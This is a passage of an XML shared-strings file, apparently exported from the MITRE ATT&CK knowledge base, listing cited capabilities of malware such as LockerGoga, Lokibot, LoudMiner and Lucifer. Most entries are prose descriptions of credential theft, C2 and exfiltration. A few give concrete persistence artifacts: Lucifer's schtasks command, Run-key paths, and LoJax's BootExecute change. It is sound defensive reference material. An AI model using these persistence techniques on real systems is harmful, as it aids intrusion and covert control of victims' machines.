    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from macOS Keychains.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from LSA secrets to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from memory to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>Proc Filesystem</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credential information running Linux processes.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from Vault files.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) contains a function to encrypt and store emails that it collects.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to automatically collect files under a specified directory.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to automatically exfiltrate files under a specified directory.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can collect files from a local system.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has used AES and XOR to decrypt configuration files and commands.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) exfiltrates data over its email C2 channel.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has a function to delete files.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has the ability to download and execute additional files.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can store email data in files and directories specified in its configuration, such as &lt;code&gt;C:\Windows\ServiceProfiles\NetworkService\appdata\Local\Temp\&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) uses SMTP for C2.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has used filenames associated with Exchange and Outlook for binary and configuration files, such as &lt;code&gt;winmail.dat&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is capable of starting a process using CreateProcess.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) encrypts its configuration files with AES-256.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>Remote Email Collection</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) collects Exchange emails matching rules specified in its configuration.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to exfiltrate data during nighttime or working hours.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is controlled via commands that are embedded into PDFs and JPGs using steganographic methods.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) uses AES to encrypt C2 traffic.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) gathers the victim computer name using the Win32 API call &lt;code&gt;GetComputerName&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) gathers information about network adapters using the Win32 API call &lt;code&gt;GetAdaptersInfo&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is capable of modifying email content, headers, and attachments during transit.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>Transport Agent</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has used a malicious Microsoft Exchange transport agent for persistence.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is capable of executing commands via cmd.exe.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can obtain data from local systems.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can change C2 servers.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can list contents of drives and search for files.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can download files onto compromised hosts.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can retrieve a list of running processes.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can retrieve system information.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can start a remote shell.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) sends the payload from the C2 server as an encoded URL parameter. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) attempts to gain access to the server via SSH.(Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) brute forces SSH passwords in order to attempt to gain access and install its malware onto the server. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>Unix Shell Configuration Modification</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) maintains persistence on an infected machine through rc.local and .bashrc files. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) acquires valid SSH accounts through brute force. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) has modified the Registry key &lt;code&gt;‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’&lt;/code&gt; from &lt;code&gt;‘autocheck autochk *’&lt;/code&gt; to &lt;code&gt;‘autocheck autoche *’&lt;/code&gt;.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) has loaded an embedded NTFS DXE driver to be able to access and write to NTFS partitions.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) has modified the Registry key &lt;code&gt;‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’&lt;/code&gt; from &lt;code&gt;‘autocheck autochk *’&lt;/code&gt; to &lt;code&gt;‘autocheck autoche *’&lt;/code&gt; in order to execute its payload during Windows startup.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[LoJax](https://attack.mitre.org/software/S0397) is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.(Citation: ESET LoJax Sept 2018) </t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed changing account passwords and logging off current users.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been signed with stolen certificates in order to make it look more legitimate.(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has encrypted files, including core Windows OS files, using RSA-OAEP MGF1 and then demanded Bitcoin be paid for the decryption key.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) installation has been immediately preceded by a "task kill" command in order to disable anti-virus.(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed deleting its original launcher after execution.(Citation: CarbonBlack LockerGoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed moving around the victim network via SMB, indicating the actors behind this ransomware are manually copying files form computer to computer instead of self-propagating.(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed shutting down infected systems.(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has stolen credentials from multiple applications and data sources including Windows OS credentials, email clients, FTP, and SFTP clients.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to initiate contact with command and control (C2) to exfiltrate stolen data.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to copy itself to a hidden file and directory.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to capture input on the compromised host via keylogging.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has been executed through malicious documents contained in spearphishing e-mails.(Citation: TrendMicro Msiexec Feb 2018)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has obfuscated strings with base64 encoding.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has used process hollowing to inject into legitimate Windows process vbc.exe.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has used several packing methods for obfuscation.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the computer name and Windows product name/version.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the domain name of the infected host.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the username on the infected host.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has used HTTP for C2 communications.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) side loads its communications module as a DLL into the &lt;code&gt;libcurl.dll&lt;/code&gt; loader.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) has a function that decrypts malicious data.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) removes itself after execution and can delete files on the system.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can retrieve file listings from the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) has a C2 proxy tool that masquerades as &lt;code&gt;GUP.exe&lt;/code&gt;, which is software used by Notepad++.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) uses a custom binary protocol over sockets for C2 communications.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can list running processes.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) sets up a Registry Run key to establish a persistence mechanism.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can take desktop screenshots.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can kill processes and delete services.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) uses a modified version of RC4 for data transfer.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can enumerate services on the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can shutdown and reboot the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) has used VBA macros in Microsoft Word attachments to drop additional files to the host.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582)’s C2 proxy tool sends data to a C2 server over HTTP.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) executes the &lt;code&gt;cmd.exe&lt;/code&gt; command.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) is typically bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) deleted installation files after completion.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) has set the attributes of the VirtualBox directory and VBoxVmService parent directory to "hidden".(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used SCP to update the miner from the C2.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) added plist files in &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; with RunAtLoad set to true.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) launched the QEMU services in the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder using &lt;code&gt;launchctl&lt;/code&gt;.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used an MSI installer to install the virtualization software.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) has obfuscated various scripts and encrypted DMG files.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used plists to execute shell scripts and maintain persistence on boot. [LoudMiner](https://attack.mitre.org/software/S0451) also added plist files in &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; with KeepAlive set to true, which would restart the process if stopped.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used the &lt;code&gt;ps&lt;/code&gt; command to monitor the running processes on the system.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) harvested system resources to mine cryptocurrency, using XMRig to mine Monero.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>Run Virtual Instance</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) has used QEMU and VirtualBox to run a Tiny Core Linux virtual machine, which runs XMRig and makes connections to the C2 server for updates.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) started the cryptomining virtual machine as a service on the infected machine.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) has monitored CPU usage.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used a script to gather the IP address of the infected machine before sending to the C2.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used shell scripts to launch various services and to start/stop the QEMU virtualization.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used a batch script to run the Linux virtual machine as a service.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) can automatically launch a Linux virtual machine as a service at startup if the AutoStart option is enabled in the VBoxVmService configuration file.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[Lslsass](https://attack.mitre.org/software/S0121) can dump active logon session password hashes from the lsass process.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can clear and remove event logs.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can decrypt its C2 address upon execution.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can exploit multiple vulnerabilities including EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0144).(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can download and execute a replica of itself using [certutil](https://attack.mitre.org/software/S0160).(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use [certutil](https://attack.mitre.org/software/S0160) for propagation on Windows hosts within intranets.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can execute TCP, UDP,  and HTTP denial of service (DoS) attacks.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can scan for open ports including TCP ports 135 and 1433.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has attempted to brute force TCP ports 135 (RPC) and 1433 (MSSQL) with the default username or list of usernames and    passwords.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can identify the process that owns remote connections.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can check for existing stratum cryptomining information in &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\spreadCpuXmr – %stratum info%&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can persist by setting Registry key values &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use system resources to mine cryptocurrency, dropping XMRig to mine Monero.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can infect victims by brute forcing SMB.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has established persistence by creating the following scheduled task &lt;code&gt;schtasks /create /sc minute /mo 1 /tn QQMusic ^ /tr C:Users\%USERPROFILE%\Downloads\spread.exe /F&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has used UPX packed binaries.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can perform a decremental-xor encryption on the initial C2 request before sending it over the wire.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can check for specific usernames, computer names, device drivers, DLL's, and virtual devices associated with sandboxed environments and can enter an infinite loop and stop itself if any are detected.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can collect the computer name, system architecture, default language, and processor frequency of a compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can collect the IP address of a compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can identify the IP and port numbers for all remote connections from the compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has the ability to identify the username on a compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can crash a debugger by passing a format string to &lt;code&gt;OutputDebugStringA()&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can issue shell commands to download and execute additional payloads.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use WMI to log into remote machines for propagation.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lurid](https://attack.mitre.org/software/S0010) can compress data before sending it.(Citation: Villeneuve 2011)</t>
  </si>
  <si>
    <t>[Lurid](https://attack.mitre.org/software/S0010) performs XOR encryption.(Citation: Villeneuve 2011)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) has the ability to upload files from an infected device.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can modify processes to prevent them from being visible on the desktop.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) has the ability to remove set Registry Keys.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can upload additional files to a compromised host.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) has been named Readme.txt to appear legitimate.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can Base64 encode output strings prior to sending to C2.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can use Registry Run Keys for persistence.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can use scheduled tasks for persistence.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can use HTTPS in communication with C2 web servers.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can launch a console process (cmd.exe) with redirected standard input and output.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) has XOR-encrypted and stored contents of SMS messages that matched its target list. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor.(Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>After checking for the existence of two files, keyword_parm.txt and parm.txt, [MESSAGETAP](https://attack.mitre.org/software/S0443) XOR decodes and read the contents of the files. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>Once loaded into memory, [MESSAGETAP](https://attack.mitre.org/software/S0443) deletes the keyword_parm.txt and parm.txt configuration files from disk. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) checks for the existence of two configuration files (keyword_parm.txt and parm.txt) and attempts to read the files every 30 seconds.(Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) stored targeted SMS messages that matched its target list in CSV files on the compromised system.(Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MESSAGETAP](https://attack.mitre.org/software/S0443) uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata.  (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>After loading the keyword and phone data files, [MESSAGETAP](https://attack.mitre.org/software/S0443) begins monitoring all network connections to and from the victim server. (Citation: FireEye MESSAGETAP October 2019)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to schedule remote AT jobs.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to delete local files.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about users on remote hosts.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to scan for open ports on hosts in a connected network.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about shares on remote hosts.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about groups.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to identify remote hosts on connected networks.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about the OS.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) uses the command-line interface.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) can record the sounds from microphones on a computer.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) can steal clipboard contents.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) deletes any temporary files it creates(Citation: alientvault macspy)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) stores itself in &lt;code&gt;~/Library/.DS_Stores/&lt;/code&gt; (Citation: alientvault macspy)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) captures keystrokes.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) persists via a Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) uses Tor for command and control.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
